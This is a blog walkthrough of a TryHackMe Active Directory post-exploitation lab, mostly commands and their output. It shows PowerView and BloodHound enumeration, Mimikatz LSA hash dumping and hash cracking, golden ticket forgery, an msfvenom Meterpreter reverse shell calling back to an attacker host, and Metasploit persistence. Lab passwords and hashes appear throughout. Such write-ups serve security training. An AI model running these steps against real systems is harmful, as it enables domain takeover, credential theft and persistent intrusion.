1. Introduction
This challenge on TryHackMe (THM) will only be covering on the basics of what we usually do after gaining access to a machine that is in an Active Directory (AD) network. Enumeration via Powerview and Bloodhound will be done along with dumping password hashes and Golden ticket using Mimikatz. Further information gathering will be done using Windows server tools and logs. Finally, Metasploit module will be used for persistency.
2. Enumeration with Powerview
Firstly, remember to connect to the TryHackMe (THM)’s VPN before SSH into the given IP address and credentials.
kali@kali~$ ssh Administrator@10.10.90.150 The authenticity of host '10.10.90.150 (10.10.90.150)' can't be established. ECDSA key fingerprint is SHA256:jGGFsdyc6+usho+SGSQoG+3agPMuI+Y0SYylUJfLP8s. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.90.150' (ECDSA) to the list of known hosts. Administrator@10.10.90.150's password: P@$$W0rd Microsoft Windows [Version 10.0.17763.737] (c) 2018 Microsoft Corporation. All rights reserved. controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator>
Powerview is a very powerful PowerShell script that is from PowerShell Empire. We can use Powerview to enumerate the domain once we have access to a machine in the network. The creator of this challenge has already placed Powerview on the remote machine for us.
Firstly, we will have to launch PowerShell with the execution policy bypassed so that we can run scripts.
controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator> powershell -ep bypass Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. PS C:\Users\Administrator>
Next, we can start PowerView and enumerate domain users.
PS C:\Users\Administrator> . .\Downloads\PowerView.ps1 PS C:\Users\Administrator> Get-NetUser | select cn cn -- Administrator Guest krbtgt Machine-1 Admin2 Machine-2 SQL Service POST{P0W3RV13W_FTW} sshd
We can also enumerate domain groups.
PS C:\Users\Administrator> Get-NetGroup -GroupName *admin* Administrators Hyper-V Administrators Storage Replica Administrators Schema Admins Enterprise Admins Domain Admins Key Admins Enterprise Key Admins DnsAdmins
A cheatsheet for PowerView was provided to us by the creator of this challenge.
Questions and answers
What is the shared folder that is not set by default?
PS C:\Users\Administrator> Invoke-ShareFinder \\Domain-Controller.CONTROLLER.local\ADMIN$ - Remote Admin \\Domain-Controller.CONTROLLER.local\C$ - Default share \\Domain-Controller.CONTROLLER.local\IPC$ - Remote IPC \\Domain-Controller.CONTROLLER.local\NETLOGON - Logon server share \\Domain-Controller.CONTROLLER.local\Share - \\Domain-Controller.CONTROLLER.local\SYSVOL - Logon server share
Answer:
Share
What operating system is running inside of the network besides Windows Server 2019?
PS C:\Users\Administrator> Get-NetComputer -fulldata | select operatingsystem operatingsystem --------------- Windows Server 2019 Standard Windows 10 Enterprise Evaluation Windows 10 Enterprise Evaluation
Answer:
Windows 10 Enterprise Evaluation
I’ve hidden a flag inside of the users find it
Answer:
POST{P0W3RV13W_FTW}
3. Enumeration with Bloodhound
Bloodhound is a graphical user interface (GUI) tool that will help us to visually map out the network in the system. Bloodhound comes along with a tool called Sharphound which is similar to PowerView where it takes information such as users, groups, etc, stores them in a .JSON file to be used inside Bloodhound. The creator of this challenge has already placed Sharphound in the victim’s machine for us.
Installation
Install Bloodhound on your attacker machine such as Kali.
kali@kali~$ sudo apt-get update && sudo apt-get install bloodhound
Getting loot with Sharphound
First things first, we will need to launch PowerShell from CMD with the execution policy bypassed. You can skip this step if you are still in the PowerShell launched previously. Next, run the Sharphound PowerShell script.
controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator>powershell -ep bypass Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. PS C:\Users\Administrator> . .\Downloads\SharpHound.ps1 PS C:\Users\Administrator>
Finally, we can collect all information using Sharphound and store it in a ZIP file.
PS C:\Users\Administrator> Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip ----------------------------------------------- Initializing SharpHound at 1:33 AM on 1/13/2022 ----------------------------------------------- Resolved Collection Methods: Group, Sessions, LoggedOn, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container [+] Creating Schema map for domain CONTROLLER.LOCAL using path CN=Schema,CN=Configuration,DC=CONTROLLER,DC=LOCAL [+] Cache File Found! Loaded 104 Objects in cache [+] Pre-populating Domain Controller SIDS Status: 0 objects finished (+0) -- Using 92 MB RAM Status: 66 objects finished (+66 8)/s -- Using 97 MB RAM Enumeration finished in 00:00:00.2933812 Compressing data to C:\Users\Administrator\20220113013345_loot.zip You can upload this file directly to the UI SharpHound Enumeration Completed at 1:33 AM on 1/13/2022! Happy Graphing!
We can transfer the ZIP file back to our attacking machine using SCP.
kali@kali~$ scp Administrator@10.10.90.150:20220113013345_loot.zip /tmp/20220113013345_loot.zip Administrator@10.10.90.150's password: P@$$W0rd 20220113013345_loot.zip
Map the network with Bloodhound
Firstly, we will need to start neo4j before starting Bloodhound in another terminal.
kali@kali~$ sudo neo4j console
The default credentials for neo4j is neo4j:neo4j. We will need to change it at http://localhost:7474/browser/. Otherwise, Bloodhound will not let us login.
Once connected, it will automatically prompt us for a new password. Change to a password you can remember.
Launch Bloodhound.
kali@kali~$ bloodhound
You should now be able to login using the default username and your new password.
Click on the Import Graph button on the right-hand side of Bloodhound window to import the ZIP file. If it does not work (such as bad .JSON file notification), drag and drop the ZIP file into the Bloodhound window.
We can now click on the menu and choose any query we are interested.
Questions and answers
What service is also a domain admin
Click on “Find all Domain Admins” and point your mouse over to the nodes. One of them will show the admin account to be “SQLSERVICE”.
Answer:
SQLSERVICE
What two users are Kerberoastable?
Click on “List all Kerberoastable Accounts”.
Answer:
SQLSERVICE,KRBTGT
4. Dumping hashes with mimikatz
Mimikatz is a popular tool for dumping passwords as well as for other purposes like generating silver/golden tickets, etc. We will be touching on dumping NTLM hashes from LSA secrets which is a storage used by Local Storage Authority (LSA) which stores password hashes in registry “HKLM:\Security\Policy\Secrets”. The creator of this challenge has already placed Mimikatz in the victim’s machine for us.
Dump hashes
Launch Mimikatz from the \Download folder and ensure “privilege::debug” output is “Privilege ’20’ ok”. Mimikatz must be run from the administrator shell to dump hashes from LSA secrets. When we SSH into the victim’s machine, it should be in the administrator shell by default.
controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator>cd Downloads && mimikatz.exe .#####. mimikatz 2.2.0 (x64) #18362 May 2 2020 16:23:51 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ mimikatz # privilege::debug Privilege '20' OK mimikatz #
We can now dump the hashes.
mimikatz # lsadump::lsa /patch Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166 RID : 000001f4 (500) User : Administrator LM : NTLM : 2777b7fec870e04dda00cd7260f7bee6 RID : 000001f5 (501) User : Guest LM : NTLM : RID : 000001f6 (502) User : krbtgt LM : NTLM : 5508500012cc005cf7082a9a89ebdfdf RID : 0000044f (1103) User : Machine1 LM : NTLM : 64f12cddaa88057e06a81b54e73b949b RID : 00000451 (1105) User : Admin2 LM : NTLM : 2b576acbe6bcfda7294d6bd18041b8fe RID : 00000452 (1106) User : Machine2 LM : NTLM : c39f2beb3d2ec06a62cb887fb391dee0 RID : 00000453 (1107) User : SQLService LM : NTLM : f4ab68f27303bcb4024650d8fc5f973a ...
Cracking those hashes with hashcat
As the question wants us to crack machine1’s hash, I will be cracking it instead of the example on TryHackMe (THM) which cracked Administrator’s hash instead.
Firstly, we have to unzip /usr/share/wordlists/rockyou.txt.gz.
kali@kali~$ sudo gunzip /usr/share/wordlists/rockyou.txt.gz
I stored the hashes of machine1 and machine2 in hash.txt. Finally, we can crack the hashes.
kali@kali~$ hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt ... 64f12cddaa88057e06a81b54e73b949b:Password1
Questions and answers
what is the Machine1 Password?
Password1
What is the Machine2 Hash?
c39f2beb3d2ec06a62cb887fb391dee0
5. Golden Ticket Attacks with mimikatz
Previously we noticed that when we dump hashes from LSA secrets, there is krbtgt’s hash. When a user submits a request for a TGT, the KDC encrypts the TGT using krbtgt account’s password hash as the secret key for the encryption. Thus, having the security identifier (SID) and NTLM hash of krbtgt account allows us to create a custom TGT which is also known as a golden ticket. Having a golden ticket allows us to any machine or account in the Active Directory (AD) network.
Firstly, we will need to use RDP to access the victim machine as we need to spawn another shell/CMD window later after generating a golden ticket. Using SSH will not allow us to access the evaluated shell later.
kali@kali~$ rdesktop -u Administrator -d CONTROLLER 10.10.90.150
Dump krbtgt’s hash
Firstly, we will need to launch Mimikatz from the administrator shell and check its privileges using “privilege::debug“.
C:\Users\Administrator>cd Downloads && mimikatz.exe .#####. mimikatz 2.2.0 (x64) #18362 May 2 2020 16:23:51 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ mimikatz # privilege::debug Privilege '20' OK mimikatz #
We can now dump the hash of krbtgt account.
mimikatz # lsadump::lsa /inject /name:krbtgt Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166 RID : 000001f6 (502) User : krbtgt * Primary NTLM : 5508500012cc005cf7082a9a89ebdfdf LM : Hash NTLM: 5508500012cc005cf7082a9a89ebdfdf ntlm- 0: 5508500012cc005cf7082a9a89ebdfdf lm - 0: 372f405db05d3cafd27f8e6a4a097b2c
Create a golden ticket
We can actually create a ticket using any username. Only the SID, domain name and password hash must be correct which is krbtgt’s SID and password hash. However, I will be using the username “Administrator” instead. Uid is set to 500 which is the RID of the domain admin, giving it the most privilege in the whole AD.
mimikatz # kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500 User : Administrator Domain : controller.local (CONTROLLER) SID : S-1-5-21-849420856-2351964222-986696166 User Id : 500 Groups Id : *513 512 520 518 519 ServiceKey: 5508500012cc005cf7082a9a89ebdfdf - rc4_hmac_nt Lifetime : 1/13/2022 7:15:55 PM ; 1/11/2032 7:15:55 PM ; 1/11/2032 7:15:55 PM -> Ticket : ticket.kirbi * PAC generated * PAC signed * EncTicketPart generated * EncTicketPart encrypted * KrbCred generated Final Ticket Saved to file !
Using the Golden Ticket to access other machine
We can now spawn an elevated shell from Mimikatz.
mimikatz # misc::cmd
By right we can use “psexec.exe \\Desktop-1 cmd.exe” in the elevated shell. However, THM does not support having multiple machines in a network. Thus, we cannot get to try accessing other machines with the golden ticket.
6. Enumerating with Server Manager
To access the Server Manager, we must RDP into the victim’s machine. Similar to task 5, we can use rdekstop.
kali@kali~$ rdesktop -u Administrator -d CONTROLLER 10.10.90.150
Enumeration with Server Manager
The manager tab in Server Manager allows us to add roles and features. However, this is not really recommended as the system admin will detect this easily. We can ignore AD CS, AD DS, DNS, or File and Storage Services as they are not useful for post-exploitation.
Navigate to the Tools tab and select “Active Directory Users and Computers”.
Over here, we can see all the domain users and groups. Sometimes password is stored in the description as well.
Questions and answers
What tool allows to view the event logs?
Event Viewer
What is the SQL Service password
MYpassword123#
7. Maintaining Access
There are many ways to maintain access on a machine. However, this challenge on TryHackMe used the persistence module from Metasploit. To do that, we will need a Meterpreter shell on the victim’s machine.
Generate meterpreter reverse shell
Firstly, we will need to generate a Windows meterpreter reverse TCP shell.
kali@kali~$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.126.2 LPORT=5555 -f exe -o shell.exe
Transfer payload shell file
We will need to transfer the file to the victim’s machine. We can do so using SCP since there is an SSH service available. After transferring the file, we can SSH into the machine and verify if the file is successfully transferred.
kali@kali~$ scp shell.exe Administrator@10.10.90.150:shell.exe Administrator@10.10.90.150's password: P@$$W0rd shell.exe kali@kali~$ ssh Administrator@10.10.90.150 Administrator@10.10.90.150's password: P@$$W0rd controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator>dir Volume in drive C has no label. Volume Serial Number is F83F-6346 Directory of C:\Users\Administrator 01/13/2022 08:36 PM <DIR> . 01/13/2022 08:36 PM <DIR> .. 05/13/2020 07:01 PM <DIR> 3D Objects 05/13/2020 07:01 PM <DIR> Contacts 05/13/2020 07:01 PM <DIR> Desktop 05/14/2020 07:27 PM <DIR> Documents 01/13/2022 07:50 PM <DIR> Downloads 05/13/2020 07:01 PM <DIR> Favorites 05/13/2020 07:01 PM <DIR> Links 05/13/2020 07:01 PM <DIR> Music 05/13/2020 07:01 PM <DIR> Pictures 05/13/2020 07:01 PM <DIR> Saved Games 05/13/2020 07:01 PM <DIR> Searches 01/13/2022 08:36 PM 73,802 shell.exe 05/13/2020 07:01 PM <DIR> Videos
Start a listener and receive a shell
Launch Metasploit using “msfconsole” command and use "exploit/multi/handler” to listen to an incoming reverse shell.
kali@kali~$ msfconsole -q msf6 > use exploit/multi/handler [*] Using configured payload windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) >
We can now set our payload, fill up LHOST and LPORT options, and run it. Note that LHOST is your attacking machine’s IP address.
msf6 exploit(multi/handler) > set LHOST 192.168.126.2 LHOST => 192.168.1.2 msf6 exploit(multi/handler) > set LPORT 5555 LPORT => 5555 msf6 exploit(multi/handler) > run
Transfer shell.exe to the victim’s machine and run it. Our meterpreter listener should receive an incoming connection. Background the meterpreter shell if yours directly access the session for you.
meterpreter> bg msf6 exploit(multi/handler) >
Run the persistence module
We can now use the persistence module so that even when the machine reboots, we will get back a connection to obtain a shell. Set the session to the session ID our meterpreter session to the victim’s machine is in. You can use “sessions” command to list all the sessions if you are unsure. Once we run the persistence module, the old session will die and a new session will be spawned.
msf6 exploit(multi/handler) > use exploit/windows/local/persistence msf6 exploit(exploit/windows/local/persistence) > set session 1 msf6 exploit(exploit/windows/local/persistence) > run meterpreter>
There we go, we now obtained persistence in the victim’s machine.
I hope this article has been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂
Lamecarrot 